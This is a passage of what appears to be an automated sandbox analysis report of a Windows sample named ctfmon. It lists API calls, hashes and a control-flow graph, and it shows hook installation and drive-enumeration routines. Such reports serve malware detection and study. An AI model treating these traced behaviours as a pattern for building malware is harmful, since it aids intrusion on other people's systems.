        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
        • String ID:
        • API String ID: 1031845853-0
        • Opcode ID: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
        • Instruction ID: 1a237f0f63429e1a6939c80a8fc9a6691efaff51cb6deb2a72a08bbb0bfadc6e
        • Opcode Fuzzy Hash: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
        • Instruction Fuzzy Hash: 8EF03670740710AEE2306B769C89F1B77A4EF90795F51452EE601572D0CAB898468AA9

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 497 4158e8-415903 498 415905-41590c 497->498 499 41590e-415912 497->499 500 415919-415920 498->500 499->500 501 415933-41593c 500->501 502 415922-415925 500->502 505 41595a 501->505 506 41593e-41593f 501->506 503 415927-41592d 502->503 504 41592f 502->504 503->501 503->504 504->501 509 415961-415967 505->509 507 415951-415958 506->507 508 415941-415942 506->508 507->509 510 415948-41594f 508->510 511 4159ec-415a01 call 40f92e call 40f937 508->511 512 415969-41596c 509->512 513 41598f 509->513 510->509 534 415bb3-415bb7 511->534 516 415986-41598d 512->516 517 41596e-415971 512->517 515 415992-4159a5 513->515 521 4159a7 515->521 522 4159d8-4159de 515->522 516->515 518 415973-415976 517->518 519 41597d-415984 517->519 518->511 523 415978-41597b 518->523 519->515 525 4159d3-4159d6 521->525 526 4159a9-4159ab 521->526 527 4159e0-4159e6 522->527 528 415a0f 522->528 523->515 533 415a16-415a20 525->533 526->525 532 4159ad-4159af 526->532 529 415a06-415a0d 527->529 530 4159e8-4159ea 527->530 528->533 529->533 530->511 530->528 535 4159b1-4159b7 532->535 536 4159ca-4159d1 532->536 537 415a22-415a30 533->537 538 415a35-415a37 533->538 535->529 539 4159b9-4159bf 535->539 536->533 537->538 540 415a32-415a34 537->540 541 415a43-415a46 538->541 542 415a39-415a3f 538->542 539->511 543 4159c1-4159c8 539->543 540->538 544 415a48 541->544 545 415a4a-415a4c 541->545 542->541 543->533 544->545 546 415a56-415a58 545->546 547 415a4e-415a54 545->547 548 415a60-415a6c call 411c97 546->548 549 415a5a 546->549 547->548 552 415a88-415aa5 CreateFileW 548->552 553 415a6e-415a83 call 40f92e call 40f937 548->553 549->548 555 415aa7-415ab6 GetLastError call 40f8bb 552->555 556 415abb-415ac4 GetFileType 552->556 553->534 568 415baa-415bb1 call 411f56 555->568 557 415ac6-415acd CloseHandle 556->557 558 415acf-415ad2 556->558 557->555 561 415ad4-415ad8 558->561 562 415ada-415add 558->562 565 415ae3-415b16 call 411dba 561->565 562->565 566 415adf 562->566 573 415b91-415b95 565->573 574 415b18-415b1b 565->574 566->565 568->534 576 415b97-415b9b 573->576 577 415ba8 573->577 574->573 575 415b1d-415b21 574->575 575->573 578 415b23-415b36 call 412848 575->578 576->577 579 415b9d-415ba4 576->579 577->568 582 415b51-415b66 call 412ae6 578->582 583 415b38-415b43 call 40f937 578->583 579->577 589 415b68-415b6d 582->589 590 415b7f-415b8f call 412848 582->590 583->573 588 415b45-415b46 call 411a55 583->588 594 415b4b-415b4f 588->594 589->590 592 415b6f-415b7d call 416b1a 589->592 590->573 590->588 592->588 592->590 594->568
        APIs
        • CreateFileW.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00415A9B
        • GetLastError.KERNEL32 ref: 00415AA7
        • GetFileType.KERNEL32(00000000), ref: 00415ABC
        • CloseHandle.KERNEL32(00000000), ref: 00415AC7
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: File$CloseCreateErrorHandleLastType
        • String ID:
        • API String ID: 1809617866-0
        • Opcode ID: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
        • Instruction ID: aab0d4c648b5e97227a39ec10cf2ade21aae79614a35b9dda5638ec353018830
        • Opcode Fuzzy Hash: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
        • Instruction Fuzzy Hash: 598149B1918A45DBEF204B68CC847EF7B60AF81364F24422BE561A73D1C7BC49C5875E
        APIs
        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 00412B60
        • GetLastError.KERNEL32 ref: 00412B6A
        • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 00412C30
        • GetLastError.KERNEL32 ref: 00412C3A
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorFileLastRead
        • String ID:
        • API String ID: 1948546556-0
        • Opcode ID: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
        • Instruction ID: 7d164bf494c3a70b5ac177ea6f34f1a928856a788b915d1263595a35fc0a8096
        • Opcode Fuzzy Hash: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
        • Instruction Fuzzy Hash: 3551E7346043859FDF218F98C9807EE7BB0AF12304F54409BE951DB351E3B899E6CB99
        APIs
          • Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
          • Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5
        • InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CEA
        • EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CFF
        • LeaveCriticalSection.KERNEL32(00000068,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411D0C
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$EnterInitialize$Leave
        • String ID:
        • API String ID: 713024617-3916222277
        • Opcode ID: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
        • Instruction ID: 13a2c4bc58f2d481d2e4a9d701e6eaf19ac6520ffe26352c078445bd6550f82f
        • Opcode Fuzzy Hash: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
        • Instruction Fuzzy Hash: BF3139725053019FD3148F20ECC47EA77E5EB41338F248A2EE6668B2E1D7B4A8C88759
        APIs
        • GetVersion.KERNEL32(?,?,?,00428FCF), ref: 0042904B
        • GetProcessVersion.KERNEL32(00000000,?,?,?,00428FCF), ref: 00429088
        • LoadCursorW.USER32(00000000,00007F02), ref: 004290B6
        • LoadCursorW.USER32(00000000,00007F00), ref: 004290C1
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CursorLoadVersion$Process
        • String ID:
        • API String ID: 2246821583-0
        • Opcode ID: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
        • Instruction ID: f2f89bb0e4747260c37c204fa35bc9d0ef2f952a0fe52942db453467d738cb5e
        • Opcode Fuzzy Hash: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
        • Instruction Fuzzy Hash: 33113DB1A107608FD7249F7A988452ABBE5FB487047804D3FE18BC6B51DB78E4418F54
        APIs
        • CloseHandle.KERNEL32(00000000,00000100,K[A,00411A8A,K[A,K[A,00000100,00000000,00415B4B,00000000), ref: 00411AEC
        • GetLastError.KERNEL32 ref: 00411AF6
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CloseErrorHandleLast
        • String ID: K[A$K[A
        • API String ID: 918212764-3551647969
        • Opcode ID: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
        • Instruction ID: 6524854afac2a70c962223058db7ab38a219dab8095493e29c0a91285f7820d6
        • Opcode Fuzzy Hash: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
        • Instruction Fuzzy Hash: 8101A73361962056C62467B96C49EEB16644FC1375F25061FFB11D62F1EE2CA8C2815D
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: DriveDrivesLogicalType
        • String ID: %c:\
        • API String ID: 4038169723-3142399695
        • Opcode ID: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
        • Instruction ID: 5a5b2ba27494c355ef28315322f719edc421758644ed9a5ba6575820666cadf4
        • Opcode Fuzzy Hash: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
        • Instruction Fuzzy Hash: A701A7629406009AC3119B08E89175BBFD99BE4311F54853FE88467380D67B994A87A9
        APIs
        • Sleep.KERNEL32(00001388), ref: 00403C91
          • Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
          • Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: DriveDrivesLogicalSleepType
        • String ID: +*&=^^^^--------DRIVE$I
        • API String ID: 998507393-3356893098
        • Opcode ID: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
        • Instruction ID: 49d0c6ced368fd66185a0629946516c02ffbc5c9166c48d24d2764af2432aa93
        • Opcode Fuzzy Hash: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
        • Instruction Fuzzy Hash: 1A015E325043049BE700DF60D85165BBFE2AB98710F80483EF95A7B3C0DA769E09DB9A
        APIs
        • GetWindowLongW.USER32(?,?), ref: 00421887
        • SetWindowLongW.USER32(?,?,00408812), ref: 004218A6
        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,004218FE,00408812,000000EC,?,?,?,00408812,?), ref: 004218C0
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Long
        • String ID:
        • API String ID: 847901565-0
        • Opcode ID: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
        • Instruction ID: 46a18c6c3a5692cf3f7d8173769a82117a3993c78e402f77b7694b3d22f29e20
        • Opcode Fuzzy Hash: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
        • Instruction Fuzzy Hash: 48F01C35210019BFDF18AF50EC959BF3B65EF14351B90842AF906C5170D731A962AAA8
        APIs
        • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0042093F
        • TranslateMessage.USER32(?), ref: 0042095F
        • DispatchMessageW.USER32(?), ref: 00420966
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Message$CallbackDispatchDispatcherTranslateUser
        • String ID:
        • API String ID: 2960505505-0
        • Opcode ID: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
        • Instruction ID: fabc7a01dc3d71df9f254138b74deb61d15ffc8e1f8f1f232a1b835c48f4a5e8
        • Opcode Fuzzy Hash: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
        • Instruction Fuzzy Hash: F6E092723005106FE3316B28AC98E7F37ECEF85B01784042EF402D2112CB649C82CA7A
        APIs
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        • GetWindowRect.USER32(?,00421B1C), ref: 00421949
        • GetWindow.USER32(?,00000004), ref: 00421966
          • Part of subcall function 0042438F: IsWindowEnabled.USER32(?), ref: 00424399
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$EnabledLongRect
        • String ID:
        • API String ID: 3170195891-0
        • Opcode ID: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
        • Instruction ID: 3d44051e79cfe25b8d70dd5f5f519bbb07aa03c4fe1e1fb717501b8327a53114
        • Opcode Fuzzy Hash: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
        • Instruction Fuzzy Hash: 39015E707002289BDB21AB25E865B7E77A9AF61714F80486EED42973A1D738ED80C65C
        APIs
        • SetFilePointer.KERNEL32(00000000,0053CB6B,00000000,00000000,00000000,0053CB6B,004126A5,0053CB6B,00000000,00000002,00000001,0053CB6B,?), ref: 00412872
        • GetLastError.KERNEL32 ref: 0041287F
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorFileLastPointer
        • String ID:
        • API String ID: 2976181284-0
        • Opcode ID: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
        • Instruction ID: 10e19110f1e5badc9e720bb41e1b460c98416622eb2bcf91d42185f1d58b7cbf
        • Opcode Fuzzy Hash: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
        • Instruction Fuzzy Hash: E0F02D3661421157CA247B78AC085DA37649F85334F21077BF531D72E1DF78C8A68359
        APIs
        • SetErrorMode.KERNEL32(00000000,00000000,0042603E,00000000,00000000,00000000,00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108), ref: 004291CF
        • SetErrorMode.KERNEL32(00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108,00000000), ref: 004291D6
          • Part of subcall function 00429229: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A
          • Part of subcall function 00429229: lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
          • Part of subcall function 00429229: lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
        • String ID:
        • API String ID: 3389432936-0
        • Opcode ID: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
        • Instruction ID: 0f0f40c96ee9f28d0d0ec8962dd78e8fd03b51d7b4fb64733512bf25de8db611
        • Opcode Fuzzy Hash: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
        • Instruction Fuzzy Hash: 1AF04975A142209FD714EF65E485A0D7BE4AF44B10F45888FF8489B3A2CF78D840CF6A
        APIs
        • HeapCreate.KERNEL32(00000000,00001000,00000000,0040D087,00000001), ref: 004103FC
          • Part of subcall function 004102A3: GetVersionExA.KERNEL32 ref: 004102C2
        • HeapDestroy.KERNEL32 ref: 0041043B
          • Part of subcall function 00412D44: HeapAlloc.KERNEL32(00000000,00000140,00410424,000003F8), ref: 00412D51
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Heap$AllocCreateDestroyVersion
        • String ID:
        • API String ID: 2507506473-0
        • Opcode ID: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
        • Instruction ID: 497c8a25df3411b8ffde37235463325da3650acc20757d7ac2592f9ec469bdd4
        • Opcode Fuzzy Hash: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
        • Instruction Fuzzy Hash: 00F06530B512119DDB645B70ED877FA2694DB9078EF24442BF684C91E1EBF884C5990A
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 004203E8
        • SetWindowsHookExW.USER32(000000FF,0042072A,00000000,00000000), ref: 004203F8
          • Part of subcall function 00428C9A: __EH_prolog.LIBCMT ref: 00428C9F
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentH_prologHookThreadWindows
        • String ID:
        • API String ID: 2183259885-0
        • Opcode ID: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
        • Instruction ID: 6bcf5cd4f4f4ddade5c49cae69e891880ade3d052de22ae2a353e1a51ef8f9c9
        • Opcode Fuzzy Hash: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
        • Instruction Fuzzy Hash: 52F08231B02230ABD7203B71B95971D2AD0AF50715F9546AEF502975E2CE288841C76D
        APIs
        • DefWindowProcW.USER32(?,?,?,?), ref: 00422487
        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0042249C
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ProcWindow$Call
        • String ID:
        • API String ID: 2316559721-0
        • Opcode ID: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
        • Instruction ID: 233a5364c896a44adc16a6cce7b45886d7cf299a5c9d453a734240230d2e1711
        • Opcode Fuzzy Hash: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
